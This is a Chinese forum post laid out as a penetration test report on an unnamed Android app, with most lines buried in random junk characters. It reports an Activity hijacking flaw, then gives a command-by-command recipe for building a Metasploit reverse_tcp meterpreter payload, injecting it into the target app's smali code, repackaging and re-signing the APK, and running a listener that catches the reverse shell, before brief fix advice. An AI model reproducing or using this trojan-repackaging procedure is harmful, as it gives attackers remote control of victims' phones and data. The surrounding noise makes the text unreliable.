: \9 ^; v- u3 w0 X* l# a" d : n/ a5 J6 [4 N# S4 U$ ] 1-2 测试结果 / E* H/ ?# |: b5 h0 \ * \ q; P& s1 H- L$ W, R) p+ Y- {

6 ?/ J4 V) A; U1 X0 `( ] 2 @' v9 q6 E. j$ F& L5 i

" |0 D1 C% g- w) o% Q % X ] P" C9 D+ [   ; S9 j" W6 | C6 I 7 |6 \3 i7 [# D$ S

" r( ^2 {$ A) ^: t9 J5 `$ H2 d3 O$ k/ S4 \4 m

U) f9 ], I0 E, r6 T ' B# J+ [, b; q: d 2 检测结果                    # m+ q J! I# U8 s . ]4 n) U& c0 u2 s3 E! I

3 G1 ?' J0 a6 ]- X+ p 5 W( M6 ?+ q8 O8 @0 _- x

6 P i" `1 s6 _6 K! o; ]# m( N/ P; X( f4 [: h, p 2.1 某某某 7 ^6 M7 L$ r! n" s6 \7 J( A0 C+ `7 c; b! _% r) T

1 L0 E& V2 d9 [- t# F3 T) @6 ~ @( w$ m

. v0 t, `2 V( H ~ U/ h- e: c9 f, h8 x Z p/ b F 2.1.1检测目标 # t. G7 u/ F+ x- X 4 B2 K h9 C* s* Z3 B2 o5 w- v

# d9 X- ?, [( @/ N 9 o6 J1 V3 ~+ e; D$ u: `6 t

4 a- o. |/ R! C / }0 p% Z( |. Z, c# B: K 目标地址: 某某某某某某APP 9 ^8 Z" K) [2 C* u / {) p" k, B0 K) C/ E7 ]! Z

) z u/ s0 h$ d: C7 O% C! n6 C2 r6 \ A

) E+ N; X7 {9 `) J! a& W! y+ t: s% w$ ?' i2 B" `! ? 2.1.2检测结果 & }, R" l/ H% W! H% M8 X9 M {1 C$ D% |6 D7 S, m7 v8 Y& u5 ]6 q

, ]: c2 I. E( z9 C/ A) Y9 a4 t, F) i; d

1 S4 h8 N: \' A 7 A* g2 J2 v; v 2.1.2.1 % o8 n2 z; f5 g% e1 ~5 V! G * b( W8 \+ l2 I

6 D% @4 k: @' H* p ' K) k, B0 _/ P% B

, t5 c( \8 }: G+ E" y7 h& S h" ^" b. i, h/ Y/ `# F% q' p5 F 漏洞链接地址:某某某某某某APP ) X; I; [( I- d1 F7 h$ h3 e9 B ( p) ^$ v+ _) P# X' I8 W+ p+ }5 ]

5 A0 H7 {- h& _ + R- m9 a4 W+ U; E$ ]/ [; Y

9 `$ B3 G8 x3 o( }7 k ' x8 q& U6 H, B5 i! J   , U+ A! V# t: O% D* ^, N " X- ~5 L5 r* Q2 p

5 M1 a! q- F* r) C% j( k! _' e ! v% L5 J2 {" _3 ^% i, h

# a9 j" { g7 u2 _0 Q / L) y1 e2 O8 c+ P 漏洞分析及取证: % m8 E% I% ~# q0 C6 G9 q+ P* U1 D [( H. N( X( y+ G# b

& r m9 |/ J& Y5 p' M / h7 I: `: H: u3 u/ A7 V) `

, n, P" U+ E* U% L2 z' {0 ? 8 Y( W3 R- ]1 P1 d) O                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: - n. O" W; C# h5 I, N+ o 2 z; F$ R4 R6 w9 u: K

; v; R9 f. i: _( t3 X. {- o4 e Y c# ?5 G( G/ A" c" N

: q3 [- q p; j' a5 C $ U5 ]. G9 }8 t$ p      ! I& T7 m8 F/ V8 u* m 5 n5 D1 U B& u

% w b6 ]; i R5 c8 h $ L/ P; n- q {* U' C9 P3 L

& a0 w4 Q9 r0 _6 L5 W- t U+ _, e+ t8 \/ i                       7 k/ f! f$ x7 B# |+ m+ m , a: p+ e$ c6 b) D

( P$ d2 O6 Y' Q) t- k - \' E$ ~+ X* Q, }* X

5 v7 E9 r2 k9 c( x k& O - N" a6 `+ L$ U' p5 Q% A 5 A7 p {( q9 \, H/ B5 M& w; M5 S; T- {3 d* ~

& J m1 j1 T9 i8 t, f; d, ?! D' x9 R0 ~0 u; K/ K

4 p3 H `9 q$ P# p5 f" r ( `6 m7 E) X$ X }0 \, [! `/ Y0 D ' R1 S8 r- B! j8 N( N/ r( j3 m

% ]2 j* H/ x0 W2 J, n2 B # N" d3 T( L( X, I& E

1 I8 k% x5 D6 w, ~! Q) e/ T; w X8 r& e- Y) l2 P2 R6 G5 j . T' ]8 \8 |0 R6 \; }5 g+ E ) u; c; |: D. b! E3 b* `2 V# S

) l; E6 Y( `, J 3 @# T$ q( U& x, E/ Z. M

; H; R V3 y, ^6 } 1 m7 A- ^" A* I1 n. D 漏洞危害:高 ; y1 ^, [) x( ]* u( M# c * ?8 H6 y( y Z4 y

6 C, }; v' u8 R 9 c) d( x- L- n6 D# `
% V! {- b5 H! {4 R/ U* M T: e* J 8 M, w* @& A) V. X+ s4 U1 ~( h 2 e9 y; Y1 D' M- w' H' G7 a. W5 \9 F0 a& b0 D4 ^/ D5 u3 D3 k& Y( r6 K2 J- Z8 J' u; S, T; r/ y& E5 L0 n' J: N, a8 ?( L; E4 n y: j+ z& t0 L) ^1 Q U6 e- e- F O7 h5 s& r- n% h g# A$ O: X! n& L6 s0 e# k4 F" z8 B8 z3 a. N1 C, Y9 \+ ^: v( {5 h% `! _9 i9 O5 q' I2 O6 C$ Y- _7 L# F) ^, v. t! B: w0 G* I o- x/ E0 T) ]' @ p2 \ `0 V+ j% q/ N5 ^6 i7 O% J7 v' |; {3 A$ B# V7 r$ U- k& N9 o! C7 j, L" F) {$ W. _9 s( [' k3 t% Q1 L* n9 C& u; D) ` n- k" k# Y: M- X2 C/ R) E$ w) M7 a) V5 P, d" Y( O8 z3 |! |' ], e& U, d% R4 H: h- r2 K6 O% X( L2 |# \5 y' f0 z6 g" f% y4 O2 r6 @5 ] r' _7 V" z" G" N( w+ ^2 u) L( q7 F- y9 U/ d# p
1 t1 _* f! C3 `$ A+ j9 u6 x. n8 C

# ?+ i- N! v0 R. S @7 Z+ y6 l D; [; y$ o7 Y7 |. z. Q7 r; P. P- y 严重程度 4 I3 R) L8 b- [' y+ l; F 0 e% J9 I1 ]$ a8 {

% r% s; n9 M% V. P$ s1 Q. t" v # q$ l0 \8 @1 q8 p2 _: x 		2 `) v, `, `0 A) _: M 0 f* w4 k N! g3 \* U/ u$ I

4 w' w, \1 s1 n8 t; ? ) b# ^( p k/ w6 ?; F: u 9 \4 e2 u+ C, ~2 Q3 n& @ 9 _( ?' b3 S* e, z3 [( j

% s; x" c9 l i# W s- W0 A' T$ f( N8 s" j 		" |, G. H) l3 V8 d U" y. p0 H d, t

, h1 w. b9 _# d3 s$ g 8 F9 [" d( g4 }: \ % T! E& N- a+ i% B% g6 b 3 U2 }: \ N: s9 g* V# {: I& R$ J

# v. U) O, T6 A& Y9 o0 x) v6 @) z h1 q 		0 Y. B1 w/ _6 u7 f& g z 8 r' Z& \ S3 ^2 x/ ]1 _) m0 F" Y

! W5 t: Q( U g! ~, a5 W + |2 x; S. m1 U! Z5 g & }8 }. l( [4 X; {/ H , ~9 X9 Y0 I0 D* S" W. c' u

' s+ Q: w8 A5 Y) @ 7 m: L- m2 p' K" O, c" A2 P2 M 		/ `/ K4 i4 C4 |/ e8 u8 y: U' d8 }' \8 g, h

! y5 @8 Z. O6 C9 n: C3 e, R % ?, i8 U* u g5 \   % I. `) q$ c& z6 X* l {/ p7 D9 D# a+ K: `7 g9 g

' G( `3 P1 x+ ]# u- ^& J, j0 a& g) t$ z# D 		$ h# ]/ s7 \1 c0 c3 w, _' D; D; z* M. x

' M' g& a {8 Z2 E; a. a& l+ |) A5 p( b" k' @9 K2 \3 s' N 8 }: R& }8 y* v$ o) }: i( C . I5 w n' i5 I2 F/ `* N

+ c; w6 r |7 V8 [8 Y ' J r% d4 p2 s, d! ]1 f! t" q 		6 u$ v* U, r* H' a Y5 F) L3 ? ' [$ ?. J3 F! v% b, a( h

4 Q, E+ R7 N6 ]. o1 x- Z 4 b) z# k( F& k' f, f& T2 I   $ D& A1 N( Q+ E6 N/ w" i7 ?0 q W0 z- Q4 U- Z

( R5 C& h$ j- P- N$ | 4 v6 J u5 J% Z- V4 d9 U6 r8 Q
& Z* _8 {0 R) M+ r : F3 y' P9 g1 S6 k
& q( Y1 a0 k! ]5 L ( C( o1 t$ G& K# I

?- t9 A1 U9 t' L3 ~1 M ' K# F3 p4 ~8 t9 ]   8 e6 q. B) {8 W O ]- |# r+ q8 s" S& z / Y! E, W9 u# O0 v# D/ w8 ]

0 L1 `& O O* s$ W* D8 M1 Y# p# q+ \! w G3 y

% C8 x2 b- S6 r& m8 y8 J ! i3 t, i' X: s* B* v+ ^9 i- t" v 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ( i0 j- @+ j( T6 H- o' j/ t' Z! @5 u. `) L+ x; G

) ?( W/ F$ d7 }, d3 `" y3 F5 a# y i; q- s7 n3 c

, I* \/ x) C& r; X& g" x# ]- ~, g ) N3 Z/ E' F# O1 j1 L           0 [- H O" |% D9 D+ f4 ~7 O, M9 p: f3 V! j9 j

/ }# G% y- X% S+ z) g: V, b; P4 ~8 ~ - g& p, _. E' S5 M7 C

# z# D' M0 a& f3 Y9 j) r7 a: Z4 y% V 0 m' U2 N7 `$ z/ Z: e8 x9 a9 U   ' N2 ]. d1 I8 |7 d5 u( _1 C! A* l3 D6 u) p5 p( `

" f% c9 G' a" q- J9 k# B" h , s9 Y" _# Q9 C! S$ l. ^9 A

& p% g* Z) N; ]1 I) g6 L % g* H# r8 M1 W0 R 2.1.2.2 % J; B) u! J- l( O, o 4 l7 z+ M/ u+ S

+ ^8 f; `' R5 J# F b. f , n/ _$ I' i5 Y$ z

' m* J5 i( o: l) F 5 L, M- ]2 n: Z8 W+ C" [9 B 漏洞链接地址:某某某某某某APP ; y) d V, F! Y 6 O4 V/ c3 e" u N9 [3 Y

/ m" D J0 F) N$ v- I 8 e4 h7 z+ E, A+ B! F1 z" u

u! k9 p0 S8 ^5 V3 Z) S' b: O4 b6 `6 q- o, i" _2 t 漏洞分析及取证: 6 N4 v" p: G) I4 l3 m; q+ A- N+ n1 K! L8 F6 }

2 i5 [, \: y ^- G$ [ 5 [8 X: |. G( f! S& ?

- S# o5 Q1 O/ Q7 d $ R3 a2 V( q7 D2 [. ^* E# o5 `8 V3 g                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: . Q0 M* g$ Y, S: X/ Y# q& x4 t. g 2 ?% p# e* t1 U! R: y

, r6 B( P" D: c 9 m& @& R/ S# b9 J! M" `' J8 s

! f+ O/ d% s; _ 6 o. g% D \. ~# G Metasploit 生成木马 apk " o v6 |* J( y" x s9 {% Y* ?- [! m

' r9 j- r/ f: L6 E. A ! u5 _, K/ f" Q

5 D3 p) D3 P0 i$ ~& Z0 T- t# X 4 ~, i2 @) f, }8 j msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 4 Q7 h3 J, S" D, P" c' z, E 3 X4 G8 z& j* ^% e# y$ |

9 w: {1 A5 B$ d( d, y & s8 ?5 U9 Y4 A) I0 r

4 P" [" D8 ~0 l- V ) J, o1 w: R4 t 反编译目标apk和木马apk ) ]8 X ~; P9 p0 y- ?# g: n+ t 5 O$ L& _# A! X* w3 [

3 U0 X! Q! n0 U/ o7 k! C- H; Z+ F# Q: `1 q/ D( f

2 g3 W6 e8 [# w8 W) z+ i4 p 3 Z1 G; d; h; F+ R9 m apktool d target.apk
, O6 G1 B8 _: n. q 6 F! l! D0 G4 X apktool d cockhorse.apk ~2 M" ?+ W! z& G5 {9 j6 l% a5 I0 c + B0 F# ~' a5 c$ K

# ^+ w# w1 }4 u& t0 w% ]4 k1 Q) }7 r- h

$ c0 ?! B( |% k6 W+ M . P5 r6 T9 F) ^/ r) \ 木马 apk 注入目标 apk - \7 ^: d1 V- q! y/ d6 X9 R! w3 k& [. ~+ ^& n4 S1 Z o# K

# F* o5 h& q0 L! P1 c ( o( u1 H# c- D9 I

- D6 T! W5 }6 l0 m % ?) n6 ~6 A9 f/ a6 V 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
: Q P+ X/ q5 @2 E& _: P) Y* W7 b, y* t" `9 B/ u) O invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V ; P9 J( k- l% R* z 0 z) H! g$ Y/ j

, W4 @! P: O4 i: N$ g1 E% a2 d6 l+ P ?4 r4 W1 N4 e$ @

- K l4 V, J' I8 u ^ Q# Q! }5 Z; L0 J 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 + }) {* D* }) _ t; G5 a# Q- y

) b5 g$ W* p, e# I! z. e2 Q2 R7 E' r; V1 F! {9 |/ J6 E, O

" S4 C2 z! w, Y4 j% g( F8 I, G A & D* v* h) p2 i C3 e/ Z5 l 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ ; M$ R* t( f- t+ s* _* B4 P5 P& {3 n

! t6 T; M2 H2 B+ `3 q& T8 \ + \4 t0 }: M4 l8 g; o" j

5 V2 M3 O% Y$ c2 S. { 6 n' W- c9 q- |" D9 q2 j8 \+ F" g5 V 回编译生成最终 apk I& D& _4 m4 a5 k% R 5 S& Z3 P' Q* s, n! M+ Z. u) X6 B% w

2 l) U# Z$ w7 g5 Y t. I' J) R! g7 P8 @9 J

& k9 I$ T# z1 j9 }' W0 I( r) r6 Y# a0 N; Q+ O 重新打包 * C9 y! h- ]+ m: N8 i 1 s% O1 }: b$ Q* p( O; g0 m# o/ r+ g% ]

5 P& `+ E6 U% l: v Q ' F1 X4 L% I* H7 o+ N* n

( g) W3 L" y5 d; }' G6 ]0 a! L; T8 C) \ " f% Z0 N# H Y n! W% I) Z apktool b -o repackage.apk target_app_floder $ |/ y* K* z; h8 C5 k! I% u + |0 K: S' [ s/ m

. n5 {1 M7 n) E+ T& Q! }7 ~' j$ z : n/ H# K/ H- l. m: W

. h8 `# [" f7 A& v; x. u/ Y# t # c8 i8 `6 _2 v1 y8 y6 } 创建签名文件,有的话可忽略此步骤 4 a: O# }2 n" _* A- `, m6 L- K! ^4 A& e5 ?* y

/ r# c1 S5 n: d( o* e . T: Y$ y n K. G, w+ {) u

; y! a* b% n7 }9 c% I/ W# r4 K V! G keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                ( |8 r: p' V: H/ N% s 5 u% l2 U# p8 _4 {& j; K

3 Y1 K$ B3 M% Z% ~1 W' R* l4 u2 J2 c0 V" l0 H

& W* a+ S. `% s) q' Y! m( g * X' w- K: \1 [' c: @3 Y 签名,以下任选其一 + V8 Z9 o9 m/ s" f& H/ L3 ?. Q$ }# J % a" I' u7 m! }# g

" R0 u$ E# A6 `/ M1 Z# v6 z8 { 1 s$ g N6 D2 F% [4 t

7 Z& g4 n6 R8 X2 e- y 5 g- A& @; F) U- ` jarsigner 方式 8 f+ J: s3 ~( r* H6 R* { Z: t & w. ^" m4 |, n$ E$ `1 V

$ L) B1 f" j! U0 a( d* J2 J9 y4 ]

`; a+ W0 J' I6 k- J $ d V6 c5 J3 K! D1 ^ jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname , v4 ^- ~- J3 c 1 t8 {% }0 r$ n- H1 u

7 o. V V/ [) ]- M/ k5 V # T: W$ r1 y, b% |' y4 C: J

/ X$ K/ k* u8 V) B# q2 ~# _ . s$ L8 b* P/ J! q: k apksigner 方式 9 t: G! D$ d; t' p( M4 U# }/ k 9 _ }* |% G3 i# A0 a

w. q! T/ O" e. k- F, v, P1 V1 c, M$ U7 ~5 X- c: z

0 W* l* \- R4 W$ X 5 ]0 [ r2 @3 t- e apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk ; q- d( R0 Q$ o/ g. Q3 }+ {, ` & y' R* a# F2 y( [2 l# L

3 a; N4 V9 o; S1 V, v1 }& a 8 u( X: L M7 Y% l8 q3 s

4 s, e2 U( {! m0 W/ G2 A( A$ x( W! l+ k 如需要禁用 v2签名 添加选项--v2-signing-enabled false & h' z% U5 O3 p8 p# Z6 ]9 W$ s & Q( N9 S* S1 K

7 c$ @, w d1 }/ Q: e . b- p, G3 h ?0 n+ T+ _

3 m1 z, s: Y% ~: B 2 f8 i; {' t% \ [ 验证,以下任选其一 & J$ D8 I/ g E" D, c ; r* u$ T9 s# {8 N

% a$ Y0 T/ Z- _ `" J6 x * l% M H- M, n- D/ _/ ~* H

0 Y% O/ {8 Y% {) J* U1 A+ c) O9 C8 V - y) K! ~2 P$ j- g9 B jarsigner方式 + Z: Z' r: j7 ~7 t 3 h9 ^ G" P* K/ }* {2 [! W3 f

7 h+ b& i4 C; z! M5 u/ ^ \ Z. N! {7 y

- K+ Y$ ~- L# x; b / p) |' Z1 n. v$ [+ g jarsigner -verify repackaged.apk " P- z6 m; V8 Z9 b$ O0 j8 A0 S 2 T9 Z; i0 \6 K' ]0 ~5 X8 T

5 R6 p( T$ W9 j& L5 b4 V* R9 B3 V9 q) m. _% t

* ~8 A5 A% S- o: p ] C& z" v) x- R apksigner 方式 ! a+ ]: [! W* E/ o 9 h( Q- i0 ?+ o. y. T$ z

. D6 Q" T( q9 }; r1 E : p( K% ?. A8 E4 S* [

! }% ~& V- h; \% p* \ 8 J+ q& t* w, d apksigner verify -v --print-certs repackaged.apk 1 C& M( L4 ~( P5 O( R0 l & u. [& ^7 s8 o! a

% S" T) A) O2 K8 X& P4 ~: `" [ : ~- F6 X* E3 ~, x

; E, Q2 ]6 t6 X' P: t. s+ H5 @ v7 k/ X% R# E keytool方式 ! t! m- N; K: B- p4 @9 Y* j V4 b. C& s% b, R9 ^+ A

- ` ]% q% N0 {# v+ Z7 Q % M, {# ^! A; \+ y* N6 v h

% {2 t {$ g. K2 W4 P$ Z / ]2 s5 \! m Z; s3 b$ A- N' y keytool -printcert -jarfile repackaged.apk 9 i* q$ ~6 P- s F + J; {" G4 ]( ~/ Z7 J

+ f& a! Z- X. Z4 ?9 h6 z* Z" \ . i% u" F4 K0 E3 ?: w) T

% K( ~& o% V3 L& g* L3 X( r, u# K' Y" y8 N0 k, ~8 D 对齐 9 M" e7 G3 C6 {3 p; v2 P% e; n 0 W) c% R+ \. D/ C2 Y& m6 c2 j

$ a! f: v* Z2 a$ \( I3 H ( Z2 V! N* ?* a( C. P: Y

$ \. X- Y: u0 E , \" R4 V# w8 T9 ^8 K 字节对齐优化 ( H: d5 _" z5 O( Y$ k- f 3 o; g, ^" K! `' I

! i @! f, M, A$ W0 K! S ) K- A1 P" M3 H7 V

% K& ~2 X" O6 ~ t. J5 i; O5 N # h5 U; L( N* ?* Z& i/ V) ~( s zipalign -v 4 repackaged.apk final.apk 9 _7 ^( u, j9 v d ( M6 P% }7 @! F: N4 K# f0 e

0 ?- D) F- f: t+ v. m- A I 4 R) T9 W5 H3 \$ u$ F$ d! @

* N, } u0 F7 [( _7 m' f m$ |9 ^0 v$ z* {) p8 @5 { 检查是否对齐 - O8 y' n* V, M. p, ~8 ] | C% p( }& m& P$ G( r& S4 u0 l+ {

' @, h" w6 y" S3 T, h 5 V4 J8 n& A% i% k6 ]

7 H( U4 @# z2 h % o: m/ r; u8 M9 n# D% j zipalign -c -v 4 final.apk & d. \7 _* M* ` 1 {9 |) O* @. o9 M

+ T; h5 N' n9 [* v4 M* |# Z* j5 H6 I9 }: Q$ f8 M9 @: O

* S8 A+ o$ z" P; C / P7 p3 @/ @9 X 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 " O* `9 v& P; p+ ~- N - {# E* w) |* R% Y+ E( U% Y

3 T* L* E. a& Y% ]0 t: y 6 p2 y5 d1 Q- C- D% M8 j1 {

1 f) I1 g1 v: k, w$ |6 }$ | ) c- S F" G6 T% A& n 启动Metasploit控制台,配置参数等待上线 " A$ M. c: F9 ?+ W- g/ i m3 F" ~7 d) m( z. o

2 X! V; k8 \) J( a8 O/ m( Q , A2 M, ` N6 u* E

( r( v" X' P7 u" P6 D* @; @+ f+ c7 V 在终端依次输入如下命令 2 G( j3 C5 E k1 k c" {4 N' j" Y$ `' l: x

) k- }3 X0 H$ Z! l' a, y# q5 `( X! U( R% L. H( D

" R$ \; \4 q5 Q) t+ Q, k/ u; s! r) N# U1 M; E* Y3 m4 R msfconsole + M' P) z. K4 ]4 r P4 V" ~, B' t 3 V _3 O+ N& ^$ }

5 ^1 f3 Y6 \/ I. k; j$ Y, ?& \$ Q8 a. t% i* V+ Z2 _2 w$ j+ U

+ D0 o; m) j: t o! z5 Z' E4 n ' W" F: A) D) b$ p3 m: w+ P$ v9 b use exploit/multi/handler & T7 V0 p3 t: R4 `1 h # [4 }( }# o$ J; w( F6 w9 i

2 `6 \+ w. {) ~% S5 t( O/ | + Y- ^: w9 h+ n, K1 L; ]0 k, x% d

4 q% ^, Q* y6 Y$ E; V1 v8 m# S! R 2 q2 D' b; P M9 [* P$ s* P+ M set PAYLOAD android/meterpreter/reverse_tcp 2 ~3 |5 }2 c; g) s & l" {' W; Q% A. K

# b |+ I; q4 r- w) }7 u0 y% Z, w) |& q0 g

% P# G4 r. N6 Y& F% j: s0 w# c $ [1 z! F1 q, h4 {: P. n set LHOST 192.xxx.xx.xx 9 j$ s- T+ {4 v# G2 q+ B/ `% d $ f# ~! l! ]! p3 m9 \5 K2 {! R

; a, G; e, |0 i9 M3 }3 D/ h . l5 q" p5 {" ~* ], B( z

$ D% D; E" a+ q8 z+ j4 G9 {3 t0 o1 y" p: f( m+ F6 {& N$ A set LPORT 4444 , K1 n8 f# @' i , o Q4 \8 V& t; k, W a

! e2 `4 s' j, x9 M( } 8 \6 C9 D& R' B5 O& ?

$ C( [9 M0 Z6 [" U ) T' o! e& S; a exploit * [/ m' ^# ^1 W. D) Z; L6 Y+ V 9 ?0 E |$ `9 O" X* G/ J+ v! L: p( u

) l, e: |, |# T% J # F N( W" B1 {& M- _( q

8 ^. o& Z9 H7 X* o& v. h7 E , a2 b' Y7 K0 ]5 P' _" ? 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               % q$ d: E' A4 l+ P / O5 p3 K6 ?. w0 [* ]0 W

' i' @- {5 w4 U* m( K4 ?$ T % @; Q* }5 B B; D& n

, ]! R6 u1 b: V! i/ {7 a& F0 Y$ N4 i5 h8 a+ O4 o: @ 漏洞危害:中 , l/ t& N3 @4 |0 x$ E4 _ " W1 Y5 R; Y% |

. a+ t1 L5 p8 Y * `3 W/ [5 p) f+ K' |& y
/ e% K8 [) c/ _& Z 1 U$ a& z; \ S# Q# a ! G/ S, e" c6 V; t. S . e) K* u& k6 Q% v* L/ r y " o5 K/ ^; X; s1 O0 n0 T- R$ y( m# ^3 r. f: X+ ]) m' W! k$ M5 h) r- H3 Z( u1 Z% {( N h9 q. ^" \! f3 b& v/ \, P* J' e9 n% ^# j' [! i; t' ~" P e' `: ?3 K- C& R r8 q+ {7 i, s" ]" e6 d2 I9 x/ }+ O, b- [3 K- R* X! B+ f( \; C/ @3 g( x- g0 ?6 O: }4 Z* m6 j& c) c7 J5 K3 F: s! \/ Y! i8 k o& D2 t7 ?- ^, Y. b! H1 u* A9 S" e6 [0 J- W/ i5 ?7 x6 [. I- f/ n3 J( Z/ t9 z! ?, t2 Y% G6 `- [' ~' `! R; ]5 Y2 \. O/ M; i! N- z3 p9 D! `# q* x1 @8 q* U. W3 E9 Q" z9 \: g# N- u# Z5 O3 A I8 m; K+ t0 b. |4 U3 m: r7 B4 m9 I7 E$ v) K4 C! g: \& d# N& j- W' U* ?, S& L" @4 [: M) t& i8 S, K& a# K9 O5 S2 r( v6 U% A" _3 Y7 x7 q
! |7 `( u6 ]! s0 L1 ] 5 f' ?4 e* ^% k$ J$ |

' Q. a: G5 v* V % X+ g' q2 M8 A, z' I' a 严重程度 3 \' m: n" w+ j& B3 w" t 3 x" [# m! `. V/ H% l

. j) N2 v M% X d- m/ {% }1 S 3 s6 F! d3 f( Q, {2 i, o0 f7 a# T 		& h; Y# F2 x/ t2 M! q2 k; \. R# R " L1 q: e4 O |5 H e

4 Q3 k5 j$ ^ R! }8 N" C, W 7 P+ e# H$ c" s& `3 R ( `! p: \ {1 y; H* } S6 z : N0 g; Y- n! x0 T; V0 d

0 T/ K8 c$ G7 x0 B& E+ D$ w. K 1 L5 A) ]1 L2 {. h3 o6 p9 q- M 		) q- A; _! p' ~8 Y: E4 o; h( B* {& v ) X; p0 z3 |' }! D6 n% b9 `

, C# d' |7 l# v" k9 M! \9 |$ z2 [- w( w/ d* k . ?' H/ w" [( x" y1 r$ e. e 3 D% e* n$ G: o3 W

( c& o. s+ ]7 c" R$ o- A' \ , w, q: n7 P2 q6 t% |) j, A4 K. m) I 		8 Q1 m8 K2 F6 h# R) x2 ~: H 2 B( D+ v' \3 z: h, g7 p

' U5 N( q1 |4 |" L; i0 a ' r& A" p$ q3 O+ h 6 e! F$ f+ p: v9 v4 C. \ 6 a2 X4 D, p' ?

) T/ j% B" _* p' i. N* T+ C7 [ 3 p' P9 c. I; U, r% O( g) } 		: C& a' ]# d3 U: C $ M8 ^* l) k) Y 0 b# [$ k& v& ] {/ ? 2 _( P6 d1 M" k/ E% x: t2 j

$ w% _* |- v- M' q1 h; I1 l* [ 2 _ e' \0 d2 m) E, Z y   * J( U6 [- a8 Z% b4 O& N, f9 a0 W; l" V1 u

6 |8 u1 F. |! Z I/ M% {+ D6 P ' B$ R. s9 D! C. C( i 		. Q/ o: T) ~+ g( P" u - E7 e- I1 ^, f2 ?5 ?/ B

% Q5 `2 L. L: t& {5 L; F* _ 0 \+ T5 i5 q5 v# i% G 7 r) B8 d* {6 Y1 Q W / G$ `# k: M8 n+ }- A" Q2 _; [

( X/ g+ p8 w2 M5 R B 3 y6 R8 G' T3 Z, K 		8 @1 u% ~7 k" B" k" Z1 Y ' l5 ^7 F9 ~ B6 F, C 9 }7 S( R- A' V' g Y ( K2 W& `1 ]9 L, D9 j# T

8 ~( q; T( J) w* V8 p2 x 7 A; `0 e% }0 [   5 G" m5 I5 E/ t$ @: ^1 U( ^1 \5 x" @

1 C# t u* i* q1 s/ f, v9 r5 ?. Q* A - _$ A1 [* z0 T7 C4 _3 v$ ^2 |
, {1 K7 |) {- N6 v / ?5 x( d( W' k3 |
6 M) n- O1 U1 ^) Z" V% q - _3 q' _1 W* b t0 ^

h5 f | c5 J9 _$ Y7 |, ~1 I | ' R% m6 V7 @( K6 N   - M' \. D7 n! b# D- I5 k# C9 ` 7 a# S, f& M; O' m6 W4 o+ o. [

5 A9 Q- T$ [2 g3 J; I , x; F* I" ~: b2 x4 F& l, ]

8 J7 b$ h2 Y( p8 a& u 1 O( Y( ]+ `+ J( X: C n; ], V. { 修复方法: $ e8 p( F& a- T- l' ~* p 9 Y4 n* |9 z9 {

! \" I6 `# W( v! W% s% C4 D 4 x! f' C3 u* Y1 _& H5 v( ^# ?

; h9 a; m/ Z6 d# `' Z# g/ _- j - D! X) }" ^1 O* g               1. APP 启动时应做签名校验防止二次打包。
7 n3 h7 j3 Q7 r& } ( I7 n+ a% l u. }! t+ J 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 / q: d! y3 a. V) G " Y9 c, P- O9 L& K

3 i \1 T& y k7 G E8 a 8 t' p5 f4 {4 q) {! p l & Y) U4 h( R% i. B3 e! A& i5 X 2 V8 `( }, y& G; p

3 K; Y% {5 i1 G# O! z $ f, Z. ~! j1 _0 a, \, d   % @4 u6 i( F: ]! @$ R8 p2 g , m1 `. k8 `! E6 J7 f) i/ J

* V" n% d3 n, z7 g1 F# v - t4 ]6 P1 H/ D2 k " P" q/ J# r; d5 H) S2 R f0 ]9 [! ^/ F9 v0 \

" Y" w) R9 |0 [ . _; n- W& |0 U- J1 k
( t9 F) V! W+ F4 v3 |" B5 n3 e* u - L% F7 p0 d8 z0 }

- y( k8 Y3 S5 C! ]) X, w( c1 Q$ [9 B; q% @% x# O
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表